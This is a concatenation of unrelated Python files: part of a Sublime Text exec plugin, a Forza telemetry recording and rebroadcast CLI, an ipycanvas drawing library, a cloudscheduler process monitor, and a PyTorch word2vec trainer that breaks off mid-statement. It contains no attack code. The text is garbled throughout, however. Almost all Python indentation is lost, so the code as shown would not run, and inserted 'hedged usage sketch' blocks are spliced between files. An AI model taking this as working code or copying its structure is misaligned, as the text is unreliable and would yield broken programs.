'<span class="message">' + html.escape(text, quote=False) + '</span>' +
'<a href=hide>' + chr(0x00D7) + '</a></div>' +
'</body>'),
sublime.LAYOUT_BELOW,
on_navigate=self.on_phantom_navigate))
phantom_set.update(phantoms)
def hide_phantoms(self):
for file, errs in self.errs_by_file.items():
view = self.window.find_open_file(file)
if view:
view.erase_phantoms("exec")
self.errs_by_file = {}
self.phantom_sets_by_buffer = {}
self.show_errors_inline = False
def on_phantom_navigate(self, url):
self.hide_phantoms()
class ExecuteEventListener(sublime_plugin.EventListener):
def on_load(self, view):
w = view.window()
if w is not None:
w.run_command('exec', {'update_phantoms_only': True})
"""
def config_paths(*versions):
if len(versions) == 0:
versions = ['2', '3']
configs = []
if SYSTEM == 'linux':
config = os.path.join(os.environ['HOME'], '.config', 'sublime-text-')
elif SYSTEM == 'osx':
config = os.path.join(os.environ['HOME'], 'Library', 'Application Support', 'Sublime Text ')
elif SYSTEM == 'win':
config = os.path.join(os.environ['AppData'], 'Sublime Text ')
for version in versions:
if os.path.exists(config + str(version)):
configs.append(config + str(version))
return configs
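# --- Hedged usage sketch (not part of the original file) ---
# config_paths() above returns whichever Sublime Text 2/3 configuration
# directories exist for the current platform. A typical follow-up is joining
# the 'Packages/User' sub-directory onto each result, which is where user
# overrides such as a custom exec.py normally live; the helper name below is
# illustrative only.
def user_package_dirs(*versions):
    return [os.path.join(config, 'Packages', 'User') for config in config_paths(*versions)]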
|
tools.py
|
import click
import gzip
from json import dumps
from multiprocessing import Manager, Process
import socket
from struct import pack
from yaspin import yaspin
from util.data_looper import DataLooper
from util.data_packet import DataPacket
from workers.recorder import worker
@click.group()
def cli():
'''
Recording and rebroadcasting tools for working with
Forza Data Packets.
'''
@cli.command()
@click.option(
'--game-version',
required=True,
type=click.Choice(['sled', 'dash', 'fh4+'], case_sensitive=False),
help='Version of the Telemetry to receive packets for'
)
@click.option(
'--file-path',
required=True,
help='Path to save the data recording at (ex. recording.json.gz - must have a .json.gz extension)'
)
@click.option(
'--host',
default='0.0.0.0',
help='Address to bind recorder to (ex. 127.0.0.1)'
)
@click.option(
'--port',
default=5555,
type=int,
help='Port to bind recorder to (ex. 5555)'
)
def record(game_version, file_path, host, port):
'''
Easily record Forza Data Packets into compressed JSON files so that they
can be reported on or rebroadcast at a later date.
'''
# Check the file extension provided
if '.'.join(file_path.split('.')[-2:]) != 'json.gz':
raise Exception(f"File name must be prepended with '.json.gz': {file_path}")
with Manager() as manager:
# Create a shared list and a worker process to handle the actual recording
packets = manager.list()
p = Process(target=worker, args=(packets, game_version, host, port,))
p.start()
# Wait for the worker to start and potentially error out
p.join(0.1)
if not p.is_alive():
print('Error starting worker, most likely a data format issue is occurring.')
return
# Wait for the User to stop recording
input('Press Enter when you are ready to stop recording.')
# Terminate the worker process if applicable
try:
p.terminate()
except:
pass
# Ensure some data was recorded
if len(packets) == 0:
print('No data was recorded, not saving to a file.')
return
# Save the packets before closing the Manager (or we lose the values)
with gzip.open(file_path, 'wb') as f:
f.write(dumps(list(packets)).encode('utf-8'))
print('Saved file to:', file_path)
@cli.command()
@click.option(
'--game-version',
required=True,
type=click.Choice(['sled', 'dash', 'fh4+'], case_sensitive=False),
help='Version of the Telemetry to generate packets for'
)
@click.option(
'--host',
required=True,
help='Host where packets are being accepted (ex. 127.0.0.1)',
)
@click.option(
'--port',
required=True,
type=int,
help='Port where packets are being accepted (ex. 5555)'
)
@click.option(
'--rate',
default=1000 / 60,
help='Rate at which to send packets (in ms) - default: 16.6666 (1000 / 60 - 60hz)'
)
@click.option(
'--input-file',
required=True,
help='Sample data file to use in the rebroadcast'
)
def rebroadcast(game_version, host, port, rate, input_file):
'''
Rebroadcast recorded Forza Data Packets to an endpoint at a specified
rate. Recordings are backwards compatible but not forward compatible:
you can record 'fh4+' packets and rebroadcast them as the 'sled' packet
type (the code automatically truncates the data as needed), but you
cannot use a 'sled' recording for the 'dash' game version, since it is
missing required fields.
'''
# Create socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Set the format for the game version
if game_version == 'sled':
data_format = DataPacket._default_format
elif game_version == 'dash':
data_format = DataPacket._dash_format
elif game_version == 'fh4+':
data_format = DataPacket._horizon_format
# Loop data until canceled
packets_sent = 0
with yaspin(color='green') as spinner:
for row in DataLooper(input_file, rate):
# Prevent older recordings being used on newer versions
if game_version == 'dash':
if len(row) == 58:
raise Exception('Data is of "sled" format but game version was set to "dash".')
elif game_version == 'fh4+' and len(row) != 89:
data_type = 'unknown'
if len(row) == 58:
data_type = 'sled'
elif len(row) == 85:
data_type = 'dash'
raise Exception(f'Data is of type "{data_type}" but game version was set to "fh4+".')
# Truncate the data as needed for older versions for backwards compatibility
if len(row) == 89: # FH4+ field length
if game_version == 'sled':
row = row[0:58]
elif game_version == 'dash':
row = row[0:58] + row[61:88]
# Send data packet
sock.sendto(pack(data_format, *row), (host, port))
packets_sent += 1
spinner.text = f'{packets_sent:,} packets sent in total'
# If the loop exits, close the socket if necessary
sock.close()
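# --- Hedged follow-up sketch (not part of the original tools.py) ---
# Shows how a recording produced by the `record` command above could be loaded
# back for inspection: `record` writes json.dumps(list_of_rows) through gzip, so
# the inverse is gzip + json.loads. The helper name `load_recording` is
# illustrative only.
def load_recording(file_path):
    """Return the list of packet rows stored in a .json.gz recording."""
    import gzip
    from json import loads
    with gzip.open(file_path, 'rb') as f:
        return loads(f.read().decode('utf-8'))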
if __name__ == '__main__':
cli()
|
core.py
|
# from IPython.core.magic import (Magics, magics_class, line_magic, cell_magic)
# Limitations:
# -> Cannot update canvas width / height by updating the global variables width / height.
# Need to use size() method or canvas object.
import threading
import time
from math import pi
import re
from IPython.display import Code, display
from ipycanvas import Canvas, hold_canvas
from ipywidgets import Button
from ipyevents import Event
from .util import IpyExit
from .util.decorators import extern, _ignite_globals, ignite_global
DEFAULT_CANVAS_SIZE = (100, 100)
FRAME_RATE = 30
NO_ACTIVITY_THRESHOLD = 5 * 60 # 5 minutes
_sparkplug_active_thread_id = None
_sparkplug_last_activity = 0
_sparkplug_running = False
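# --- Hedged illustration (not part of the original module) ---
# Sketch of the single-active-loop pattern the module-level globals above support:
# each new draw loop stores its thread id in a shared variable, and any older loop
# that sees a different id stops itself. Names here (_demo_active_id, demo_loop)
# are illustrative only; Core.loop() below applies the same idea with
# _sparkplug_active_thread_id plus an inactivity timeout.
_demo_active_id = None

def demo_loop(iterations=3):
    global _demo_active_id
    my_id = threading.current_thread().native_id
    _demo_active_id = my_id
    for _ in range(iterations):
        if _demo_active_id != my_id:
            return  # a newer loop has taken over; exit quietly
        time.sleep(1 / FRAME_RATE)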
class Core:
# All constants that will be injected into global scope in the user's cell
global_constants = {
"pi": pi
}
ignite_globals = _ignite_globals
def __init__(self, globals_dict):
self.status_text = display(Code(""), display_id=True)
self._globals_dict = globals_dict
self._methods = {}
self.stop_button = Button(description="Stop")
self.stop_button.on_click(self.on_stop_button_clicked)
self._globals_dict["canvas"] = Canvas()
self.kb_mon = Event(source=self.canvas, watched_events=['keydown', 'keyup'], wait=1000 // FRAME_RATE,
prevent_default_actions=True)
self.output_text = ""
self.color_strings = {
"default": "#888888"
}
match_255 = r"(?:(?:2(?:(?:5[0-5])|(?:[0-4][0-9])))|(?:[01]?[0-9]{1,2}))"
match_alpha = r"(?:(?:1(?:\.0*)?)|(?:0(?:\.[0-9]*)?))"
match_360 = r"(?:(?:3[0-5][0-9])|(?:[0-2]?[0-9]{1,2}))"
match_100 = r"(?:100|[0-9]{1,2})"
self.regexes = [
re.compile(r"#[0-9A-Fa-f]{6}"),
re.compile(r"rgb\({},{},{}\)".format(match_255, match_255, match_255)),
re.compile(r"rgba\({},{},{},{}\)".format(match_255, match_255, match_255, match_alpha)),
re.compile(r"hsl\({},{}%,{}%\)".format(match_360, match_100, match_100)),
re.compile(r"hsla\({},{}%,{}%,{}\)".format(match_360, match_100, match_100, match_alpha))
]
self.width, self.height = DEFAULT_CANVAS_SIZE
self.mouse_x = 0
self.mouse_y = 0
self.mouse_is_pressed = False
self.key = ""
self._keys_held = {}
# Settings for drawing text (https://ipycanvas.readthedocs.io/en/latest/drawing_text.html).
self.font_settings = {
'size': 12.0,
'font': 'sans-serif',
'baseline': 'top',
'align': 'left'
}
### Properties ###
@property
@ignite_global
def canvas(self) -> Canvas:
return self._globals_dict["canvas"]
@property
@ignite_global
def mouse_x(self):
return self._globals_dict["mouse_x"]
@mouse_x.setter
def mouse_x(self, val):
self._globals_dict["mouse_x"] = val
@property
@ignite_global
def mouse_y(self):
return self._globals_dict["mouse_y"]
@mouse_y.setter
def mouse_y(self, val):
self._globals_dict["mouse_y"] = val
@property
@ignite_global
def mouse_is_pressed(self):
return self._globals_dict["mouse_is_pressed"]
@mouse_is_pressed.setter
def mouse_is_pressed(self, val):
self._globals_dict["mouse_is_pressed"] = val
@property
@ignite_global
def key(self):
return self._globals_dict["key"]
@key.setter
def key(self, val):
self._globals_dict["key"] = val
@property
@ignite_global
def width(self):
return self._globals_dict["width"]
@width.setter
def width(self, val):
self._globals_dict["width"] = val
self.canvas.width = val
@property
@ignite_global
def height(self):
return self._globals_dict["height"]
@height.setter
def height(self, val):
self._globals_dict["height"] = val
self.canvas.height = val
### Library init ###
# Updates last activity time
@staticmethod
def refresh_last_activity():
global _sparkplug_last_activity
_sparkplug_last_activity = time.time()
# Creates canvas and starts thread
def start(self, methods):
self._methods = methods
draw = self._methods.get("draw", None)
if draw:
self.print_status("Running...")
display(self.stop_button)
display(self.canvas)
self.output_text_code = display(Code(self.output_text), display_id=True)
self.canvas.on_mouse_down(self.on_mouse_down)
self.canvas.on_mouse_up(self.on_mouse_up)
self.canvas.on_mouse_move(self.on_mouse_move)
self.kb_mon.on_dom_event(self.handle_kb_event)
# Initialize text drawing settings for the canvas.
self.canvas.font = f"{self.font_settings['size']}px {self.font_settings['font']}"
self.canvas.text_baseline = 'top'
self.canvas.text_align = 'left'
thread = threading.Thread(target=self.loop)
thread.start()
def stop(self, message="Stopped"):
global _sparkplug_running
if not _sparkplug_running:
return
_sparkplug_running = False
self.print_status(message)
self.kb_mon.reset_callbacks()
self.kb_mon.close()
# Assuming we're using IPython to draw the canvas through the display() function.
# Commenting this out for now; it throws an exception since it does not derive from BaseException.
# raise IpyExit
# Loop method that handles drawing and setup
def loop(self):
global _sparkplug_active_thread_id, _sparkplug_running
# Set active thread to this thread. This will stop any other active thread.
current_thread_id = threading.current_thread().native_id
_sparkplug_active_thread_id = current_thread_id
_sparkplug_running = True
self.refresh_last_activity()
draw = self._methods.get("draw", None)
setup = self._methods.get("setup", None)
if setup:
try:
setup()
except Exception as e:
self.stop("Error in setup() function: " + str(e))
return
while _sparkplug_running:
if _sparkplug_active_thread_id != current_thread_id \
or time.time() - _sparkplug_last_activity > NO_ACTIVITY_THRESHOLD:
self.stop("Stopped due to inactivity")
return
if not draw:
self.stop("Done drawing.")
return
with hold_canvas(self.canvas):
try:
draw()
except Exception as e:
self.stop("Error in draw() function: " + str(e))
return
time.sleep(1 / FRAME_RATE)
# Prints status to embedded error box
def print_status(self, msg):
self.status_text.update(Code(msg))
# Prints output to embedded output box
# Can't use @validate_args decorator for functions actually accepting variable arguments
@ignite_global
def print(self, *args, sep=' ', end='\n', flush=True):
global _sparkplug_running
self.output_text += sep.join([str(arg) for arg in args]) + end
if _sparkplug_running and flush:
self.output_text_code.update(Code(self.output_text))
# Update mouse_x, mouse_y, and call mouse_down handler
def on_mouse_down(self, x, y):
self.refresh_last_activity()
self.mouse_x, self.mouse_y = int(x), int(y)
self.mouse_is_pressed = True
mouse_down = self._methods.get("mouse_down", None)
if mouse_down:
mouse_down()
# Update mouse_x, mouse_y, and call mouse_up handler
def on_mouse_up(self, x, y):
self.refresh_last_activity()
self.mouse_x, self.mouse_y = int(x), int(y)
self.mouse_is_pressed = False
mouse_up = self._methods.get("mouse_up", None)
if mouse_up:
mouse_up()
# Update mouse_x, mouse_y, and call mouse_moved handler
def on_mouse_move(self, x, y):
self.refresh_last_activity()
self.mouse_x, self.mouse_y = int(x), int(y)
mouse_moved = self._methods.get("mouse_moved", None)
if mouse_moved:
mouse_moved()
def on_stop_button_clicked(self, button):
self.stop()
@extern
def handle_kb_event(self, event): pass
### User overrideable functions ###
# The function bodies here do not matter, they are discarded
@ignite_global(mutable=True)
def setup(self): pass
@ignite_global(mutable=True)
def draw(self): pass
@ignite_global(mutable=True)
def mouse_up(self): pass
@ignite_global(mutable=True)
def mouse_down(self): pass
@ignite_global(mutable=True)
def mouse_moved(self): pass
@ignite_global(mutable=True)
def key_pressed(self): pass
@ignite_global(mutable=True)
def key_released(self): pass
@ignite_global(mutable=True)
def key_repeated(self): pass
### Global functions ###
# From .util.helper_functions.keyboard_functions
@extern
def keys_held(self, *args): pass
@extern
def key_held(self, *args): pass
# From .util.helper_functions.canvas_functions
@extern
def size(self, *args): pass
@extern
def fill_style(self): pass
@extern
def stroke_style(self, *args): pass
@extern
def clear(self, *args): pass
@extern
def background(self, *args): pass
# From util.helper_functions.rect_functions
@extern
def rect(self, *args): pass
@extern
def fill_rect(self, *args): pass
@extern
def stroke_rect(self, *args): pass
@extern
def clear_rect(self, *args): pass
# From util.helper_functions.square_functions
@extern
def square(self, *args): pass
@extern
def stroke_square(self, *args): pass
@extern
def fill_square(self, *args): pass
# From util.helper_functions.circle_functions
@extern
def circle(self, *args): pass
@extern
def fill_circle(self, *args): pass
@extern
def stroke_circle(self, *args): pass
# From util.helper_functions.ellipse_functions
@extern
def ellipse(self, *args): pass
@extern
def fill_ellipse(self, *args): pass
@extern
def stroke_ellipse(self, *args): pass
# From util.helper_functions.arc_functions
@extern
def arc(self, *args): pass
@extern
def fill_arc(self, *args): pass
@extern
def stroke_arc(self, *args): pass
# From util.helper_functions.triangle_functions
@extern
def triangle(self, *args): pass
@extern
def fill_triangle(self, *args): pass
@extern
def stroke_triangle(self, *args): pass
# From util.helper_functions.text_functions
@extern
def text_size(self, *args): pass
@extern
def text_align(self, *args): pass
@extern
def text(self, *args): pass
# From util.helper_functions.line_functions
@extern
def draw_line(self, *args): pass
@extern
def line(self, *args): pass
@extern
def line_width(self, *args): pass
# An alias to line_width
@extern
def stroke_width(self, *args): pass
# From util.helper_functions.image_functions
@extern
def image(self, *args): pass
### Helper Functions ###
# From util.helper_functions.misc_functions
@extern
def parse_color(self, *args, func_name="parse_color"): pass
@extern
def color(self, *args): pass
@extern
def parse_color_string(self, func_name, s): pass
@extern
def arc_args(self, *args): pass
@extern
def random(self, *args): pass
@extern
def randint(self, *args): pass
@extern
def bounding_box(self, *args): pass
@extern
def collided(self, *args): pass
@extern
def axis_overlapped(self, *args): pass
|
ProcessMonitor.py
|
import multiprocessing
from multiprocessing import Process
import logging
import time
import datetime
import subprocess
import psutil
import os
import sys
from cloudscheduler.lib.db_config import Config
class ProcessMonitor:
config = None
processes = {}
process_ids = {}
static_process_ids = {}
dynamic_process_ids = {}
logging = None
log_file = None
log_level = None
def __init__(self, config_params, pool_size, process_ids=None, config_file='/etc/cloudscheduler/cloudscheduler.yaml', log_file=None, log_level=None, log_key=None):
self.config = Config(config_file, config_params, pool_size=pool_size)
if log_file is None:
if log_key is not None:
self.log_file = self.config.__dict__[log_key]["log_file"]
else:
self.log_file = self.config.categories[os.path.basename(sys.argv[0])]["log_file"]
else:
self.log_file = log_file
if log_level is None:
if log_key is not None:
self.log_level = self.config.__dict__[log_key]["log_level"]
else:
self.log_level = self.config.categories[os.path.basename(sys.argv[0])]["log_level"]
else:
self.log_level = log_level
logging.basicConfig(
filename=self.log_file,
level=self.log_level,
format='%(asctime)s - %(processName)-12s - %(process)d - %(levelname)s - %(message)s')
self.logging = logging.getLogger()
self.process_ids = process_ids if process_ids is not None else {}
for proc in self.process_ids:
if isinstance(process_ids[proc], list):
# add dynamic process
function = process_ids[proc][0]
select = process_ids[proc][1]
self.config.db_open()
rows=[]
rc, msg = self.config.db_execute(select)
for row in self.config.db_cursor:
rows.append(row)
if rc == 0:
#process rows
for row in rows:
logging.debug("Parsing csv2_cloud row: %s" % row)
target_group = row["group_name"]
target_cloud = row["cloud_name"]
dyna_proc = {
"function": function,
"args": [target_group, target_cloud],
"process": None
}
self.dynamic_process_ids[proc + "-" + target_group + "-" + target_cloud] = dyna_proc
else:
#something wrong with the select
self.logging.error("Failed to retrieve child targets from select statement:%s \n Error: %s" % (select, msg))
self.config.db_close()
else:
# its a static process
logging.debug("Adding static process: %s" % process_ids[proc])
self.static_process_ids[proc] = process_ids[proc]
def get_process_ids(self):
return self.process_ids
def add_process_id(self, process_id, function):
self.process_ids[process_id] = function
_init_cpu_sleep_time(process_id)
return
def del_process(self, process_id, dynamic=False):
proc = self.processes.get(process_id)
if proc:
logging.info("Deleting process: %s" % process_id)
#if self.is_alive(process_id):
#proc.join()
del self.processes[process_id]
if dynamic:
self.dynamic_process_ids.pop(process_id)
else:
self.process_ids.pop(process_id)
self.static_process_ids.pop(process_id)
return
def get_logging(self):
return self.logging
def get_config(self):
return self.config
def start_all(self):
# start static_ids
for process in self.static_process_ids:
if process not in self.processes or not self.processes[process].is_alive():
if process in self.processes:
logging.error("Restarting %s...", process)
else:
logging.info("Starting %s...", process)
self.processes[process] = Process(target=self.process_ids[process])
self.processes[process].start()
# start dynamic_ids
for process in self.dynamic_process_ids:
if process not in self.processes or not self.processes[process].is_alive():
if process in self.processes:
logging.error("Restarting %s...", process)
else:
logging.info("Starting %s...", process)
# key here should be function-group-cloud
self.processes[process] = Process(target=self.dynamic_process_ids[process]["function"], args = (self.dynamic_process_ids[process]["args"],))
self.processes[process].start()
def restart_process(self, process, dynamic=False):
# Capture tail of log when process has to restart
try:
proc = subprocess.Popen(['tail', '-n', '50', self.config.categories[os.path.basename(sys.argv[0])]["log_file"]], stdout=subprocess.PIPE)
lines = proc.stdout.readlines()
timestamp = str(datetime.date.today())
with open(''.join([self.log_file, '-crash-', timestamp]), 'wb') as f:
for line in lines:
f.write(line)
except Exception as ex:
self.logging.exception(ex)
if dynamic:
self.processes[process] = Process(target=self.dynamic_process_ids[process]["function"], args = (self.dynamic_process_ids[process]["args"],))
self.processes[process].start()
else:
self.processes[process] = Process(target=self.process_ids[process])
self.processes[process].start()
def is_alive(self, process):
return self.processes[process].is_alive()
def kill_join_all(self):
for proc in self.processes:
pro = self.processes[proc]
try:
pro.terminate()
pro.join()
self._cleanup_event_pids(proc)
except:
logging.error("failed to join process %s", pro.name)
def join_all(self):
for proc in self.processes:
pro = self.processes[proc]
try:
pro.join()
except:
logging.error("failed to join process %s", pro.name)
def check_processes(self, stop=False):
if stop and len(self.process_ids) == 0:
logging.info("Stop set and all children shut down, exiting...")
exit(0)
if stop:
for proc in self.process_ids:
if isinstance(self.process_ids[proc], list):
function = self.process_ids[proc][0]
select = self.process_ids[proc][1]
self.config.db_open()
rows=[]
rc, msg = self.config.db_execute(select)
for row in self.config.db_cursor:
rows.append(row)
if rc == 0:
for row in rows:
target_group = row["group_name"]
target_cloud = row["cloud_name"]
proc_key = proc + "-" + target_group + "-" + target_cloud
if proc_key in self.processes and self.is_alive(proc_key):
logging.info("Stop dynamic set, terminating child: %s" % proc)
self.processes[proc].terminate()
else:
self.logging.error("Failed to retrieve child targets from select statement: %s" % msg)
self.config.db_close()
elif self.is_alive(proc):
logging.info("Stop static set, terminating child: %s" % proc)
self.processes[proc].terminate()
procs_to_remove = []
# handle static processes
for process in self.static_process_ids:
if process not in self.processes or not self.is_alive(process):
if stop:
# child proc is dead, and stop flag set, don't restart and remove proc id
procs_to_remove.append(process)
if process in self.processes:
del self.processes[process]
continue
if process in self.processes:
logging.error("%s process died, restarting...", process)
logging.debug("exit code: %s" , self.processes[process].exitcode)
# self.config.update_service_catalog(error="%s process died, exit code: %s" % (process, self.processes[process].exitcode))
self.config.update_service_catalog(host_id=self.config.local_host_id, error="%s process died, exit code: %s" % (process, self.processes[process].exitcode))
del self.processes[process]
else:
self.logging.info("Restarting %s process", process)
#self._cleanup_event_pids(process)
self.restart_process(process)
time.sleep(self.config.categories["ProcessMonitor"]["sleep_interval_main_short"])
p = psutil.Process(self.processes[process].pid)
# handle dynamic processes
dynamic_procs = self.dynamic_process_ids.keys()
dynamic_procs_set = set(dynamic_procs)
for proc in self.process_ids:
#check if its a list
if isinstance(self.process_ids[proc], list):
#TODO ADD STOP LOGIC
# add dynamic process
function = self.process_ids[proc][0]
select = self.process_ids[proc][1]
self.config.db_open()
rows=[]
rc, msg = self.config.db_execute(select)
for row in self.config.db_cursor:
rows.append(row)
if rc == 0:
#process rows
for row in rows:
target_group = row["group_name"]
target_cloud = row["cloud_name"]
# check if process already in our list, if it is check if it's alive
proc_key = proc + "-" + target_group + "-" + target_cloud
if proc_key in dynamic_procs_set:
dynamic_procs_set.remove(proc_key)
if proc_key in self.processes:
#check if it's alive
if not self.is_alive(proc_key) and not stop:
#restart it
logging.error("%s process died, restarting...", proc_key)
self.config.update_service_catalog(host_id=self.config.local_host_id, error="%s process died, exit code: %s" % (proc_key, self.processes[proc_key].exitcode))
self.restart_process(proc_key, dynamic=True)
else:
#else create a new thread
dyna_proc = {
"function": function,
"args": [target_group, target_cloud],
"process": None
}
self.dynamic_process_ids[proc + "-" + target_group + "-" + target_cloud] = dyna_proc
else:
#something wrong with the select
self.logging.error("Failed to retrieve child targets from select statement: %s" % msg)
#check for any dynamic processes that are no longer needed
# anything left in dynamic_procs_set is no longer in the database
for proc in dynamic_procs_set:
#join it
self.del_process(proc, dynamic=True)
for proc in procs_to_remove:
if proc in self.process_ids:
self.process_ids.pop(proc)
def _cleanup_event_pids(self, pid):
path = self.config.categories["ProcessMonitor"]["signal_registry"]
event_dirs = os.walk(path)
for epath in event_dirs:
pid_path = epath[0] + "/" + pid
if os.path.isfile(pid_path):
os.unlink(pid_path)
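# --- Hedged usage sketch (not part of the original module) ---
# Illustrates how ProcessMonitor appears to be driven by a service's main loop:
# static workers are plain callables keyed by name, dynamic workers are
# [callable, select_sql] pairs expanded into one child per (group, cloud) row.
# The worker, the config category list and the sleep interval below are
# placeholders, not real cloudscheduler settings.
def _example_worker():
    while True:
        time.sleep(5)

def _example_main_loop():
    procmon = ProcessMonitor(config_params=["ProcessMonitor"], pool_size=2,
                             process_ids={"example": _example_worker})
    procmon.start_all()
    while True:
        time.sleep(30)
        procmon.check_processes()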
def terminate(signal_num, frame):
try:
logging.info("Recieved signal %s, removing pid file." % signal_num)
pid_file = frame.f_globals["PID_FILE"]
os.unlink(pid_file)
except Exception as exc:
logging.debug("Failed to unlink pid file:")
logging.debug(exc)
#Returns false if pid exists, true if pid is gone
def check_pid(pid_file):
if os.path.exists(pid_file):
#PID still exists, return false
return False
else:
return True
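# --- Hedged usage sketch (not part of the original module) ---
# check_pid() above only reports whether the pid file is absent, and terminate()
# expects PID_FILE to be reachable through the interrupted frame's globals. A
# minimal wiring sketch under those assumptions; the pid file path and function
# name are placeholders.
def _example_pid_guard(pid_file="/tmp/example-service.pid"):
    import signal
    if not check_pid(pid_file):
        raise SystemExit("another instance appears to be running")
    globals()["PID_FILE"] = pid_file  # terminate() looks this up via frame.f_globals
    with open(pid_file, "w") as f:
        f.write(str(os.getpid()))
    signal.signal(signal.SIGINT, terminate)
    signal.signal(signal.SIGTERM, terminate)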
|
main2.py
|
#!/usr/bin/env python3
import argparse
from collections import Counter
from multiprocessing import set_start_method
import pdb
import re
import sys
import time
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch import optim
import torch.nn.functional as F
import torch.multiprocessing as mp
import data_producer
import dataloader
from utils import LookupTable
parser = argparse.ArgumentParser()
parser.add_argument("--train", type=str, default="", help="training file")
parser.add_argument("--output", type=str, default="vectors.txt", help="output word embedding file")
parser.add_argument("--size", type=int, default=300, help="word embedding dimension")
parser.add_argument("--cbow", type=int, default=1, help="1 for cbow, 0 for skipgram")
parser.add_argument("--window", type=int, default=5, help="context window size")
parser.add_argument("--sample", type=float, default=1e-4, help="subsample threshold")
parser.add_argument("--negative", type=int, default=10, help="number of negative samples")
parser.add_argument("--min_count", type=int, default=5, help="minimum frequency of a word")
parser.add_argument("--processes", type=int, default=4, help="number of processes")
parser.add_argument("--num_workers", type=int, default=6, help="number of workers for data processsing")
parser.add_argument("--iter", type=int, default=5, help="number of iterations")
parser.add_argument("--lr", type=float, default=-1.0, help="initial learning rate")
parser.add_argument("--batch_size", type=int, default=100, help="(max) batch size")
parser.add_argument("--cuda", action='store_true', default=False, help="enable cuda")
parser.add_argument("--output_ctx", action='store_true', default=False, help="output context embeddings")
MAX_SENT_LEN = 1000
# Build the vocabulary.
def file_split(f, delim=' \t\n', bufsize=1024):
prev = ''
while True:
s = f.read(bufsize)
if not s:
break
tokens = re.split('['+delim+']{1,}', s)
if len(tokens) > 1:
yield prev + tokens[0]
prev = tokens[-1]
for x in tokens[1:-1]:
yield x
else:
prev += s
if prev:
yield prev
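# --- Hedged illustration (not part of the original script) ---
# file_split() streams whitespace-separated tokens from a file object without
# loading the whole file into memory; a quick check on an in-memory file
# (names illustrative):
def _file_split_demo():
    import io
    return list(file_split(io.StringIO("the quick  brown\tfox\n")))
    # -> ['the', 'quick', 'brown', 'fox']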
def build_vocab(args):
vocab = Counter()
word_count = 0
for word in file_split(open(args.train)):
vocab[word] += 1
word_count += 1
if word_count % 10000 == 0:
sys.stdout.write('%d\r' % len(vocab))
freq = {k:v for k,v in vocab.items() if v >= args.min_count}
word_count = sum([freq[k] for k in freq])
word_list = sorted(freq, key=freq.get, reverse=True)
word2idx = {}
vocab_map = LookupTable()
idx_count = np.zeros((len(word_list),))
for i,w in enumerate(word_list):
vocab_map[w] = i
word2idx[w] = i
idx_count[i] = freq[w]
print("Vocab size: %ld" % len(word2idx))
print("Words in train file: %ld" % word_count)
vars(args)['vocab_size'] = len(word2idx)
vars(args)['train_words'] = word_count
padding_index = len(word2idx)
vocab_map.set_missing(padding_index)
#return word2idx, word_list, freq
return vocab_map, word_list, idx_count
class CBOWMean(torch.autograd.Function):
@staticmethod
def forward(ctx, x, lens):
ctx.save_for_backward(x)
x = torch.sum(x, 1, keepdim=True)
x = x.permute(1,2,0) / lens
return x.permute(2,0,1)
@staticmethod
def backward(ctx, g):
x, = ctx.saved_variables
return g.expand_as(x), None
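# --- Hedged illustration (not part of the original script) ---
# CBOWMean sums each example's context embeddings and divides by the true
# (unpadded) context length while keeping the (batch, 1, dim) shape the rest of
# the forward pass expects; padded slots map to the zero embedding row, so they
# do not skew the mean. A small shape/value check under that reading
# (names illustrative):
def _cbow_mean_demo():
    x = torch.ones(2, 4, 3)            # batch=2, up to 4 context slots, dim=3
    lens = torch.tensor([4.0, 2.0])    # true context lengths per example
    out = CBOWMean.apply(x, lens)      # -> shape (2, 1, 3); rows are 1.0 and 2.0
    assert out.shape == (2, 1, 3)
    return out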
class CBOW(nn.Module):
def __init__(self, args):
super(CBOW, self).__init__()
self.emb0_lookup = nn.Embedding(args.vocab_size+1, args.size, padding_idx=args.vocab_size, sparse=True)
self.emb1_lookup = nn.Embedding(args.vocab_size, args.size, sparse=True)
self.emb0_lookup.weight.data.uniform_(-0.5/args.size, 0.5/args.size)
self.emb0_lookup.weight.data[args.vocab_size].fill_(0)
self.emb1_lookup.weight.data.uniform_(-0.5/args.size, 0.5/args.size)
self.window = args.window
self.negative = args.negative
self.pad_idx = args.vocab_size
def forward(self, word_idx, ctx_inds, ctx_lens, neg_inds):
w_embs = self.emb1_lookup(word_idx)
c_embs = self.emb0_lookup(ctx_inds)
n_embs = self.emb1_lookup(neg_inds)
c_embs = CBOWMean.apply(c_embs, ctx_lens)
#c_embs = torch.mean(c_embs, 1, keepdim=True)
#c_embs = torch.sum(c_embs, 1, keepdim=True)
pos_ips = torch.sum(c_embs[:,0,:] * w_embs, 1)
neg_ips = torch.bmm(n_embs, c_embs.permute(0,2,1))[:,:,0]
# Neg Log Likelihood
pos_loss = torch.sum( -F.logsigmoid(torch.clamp(pos_ips,max=10,min=-10)) )
neg_loss = torch.sum( -F.logsigmoid(torch.clamp(-neg_ips,max=10,min=-10)) )
#neg_loss = torch.sum( -F.logsigmoid(torch.clamp(-neg_ips,max=10,min=-10)) * neg_mask )
return pos_loss + neg_loss
class SG(nn.Module):
def __init__(self, args):
super(SG, self).__init__()
self.emb0_lookup = nn.Embedding(args.vocab_size+1, args.size, padding_idx=args.vocab_size, sparse=True)
self.emb1_lookup = nn.Embedding(args.vocab_size, args.size, sparse=True)
self.emb0_lookup.weight.data.uniform_(-0.5/args.size, 0.5/args.size)
self.emb1_lookup.weight.data.zero_()
self.window = args.window
self.negative = args.negative
self.pad_idx = args.vocab_size
def forward(self, data):
word_idx = data[:, 0]
ctx_idx = data[:, 1]
neg_indices = data[:, 2:2+self.negative]
neg_mask = data[:, 2+self.negative:].float()
w_embs = self.emb0_lookup(word_idx)
c_embs = self.emb1_lookup(ctx_idx)
n_embs = self.emb1_lookup(neg_indices)
pos_ips = torch.sum(w_embs * c_embs, 1)
neg_ips = torch.bmm(n_embs, torch.unsqueeze(w_embs,1).permute(0,2,1))[:,:,0]
# Neg Log Likelihood
pos_loss = torch.sum( -F.logsigmoid(torch.clamp(pos_ips,max=10,min=-10)) )
neg_loss = torch.sum( -F.logsigmoid(torch.clamp(-neg_ips,max=10,min=-10)) * neg_mask )
return pos_loss + neg_loss
# Initialize model.
def init_net(args):
if args.cbow == 1:
if args.lr == -1.0:
vars(args)['lr'] = 0.05
return CBOW(args)
elif args.cbow == 0:
if args.lr == -1.0:
vars(args)['lr'] = 0.025
return SG(args)
# Training
def train_process(p_id, word_count_actual, vocab_map, idx_count, args, model):
dataset = dataloader.SentenceDataset(
"%s.%d" % (args.train, p_id),
vocab_map,
)
loader = dataloader.CBOWLoader(dataset, args.window, idx_count,
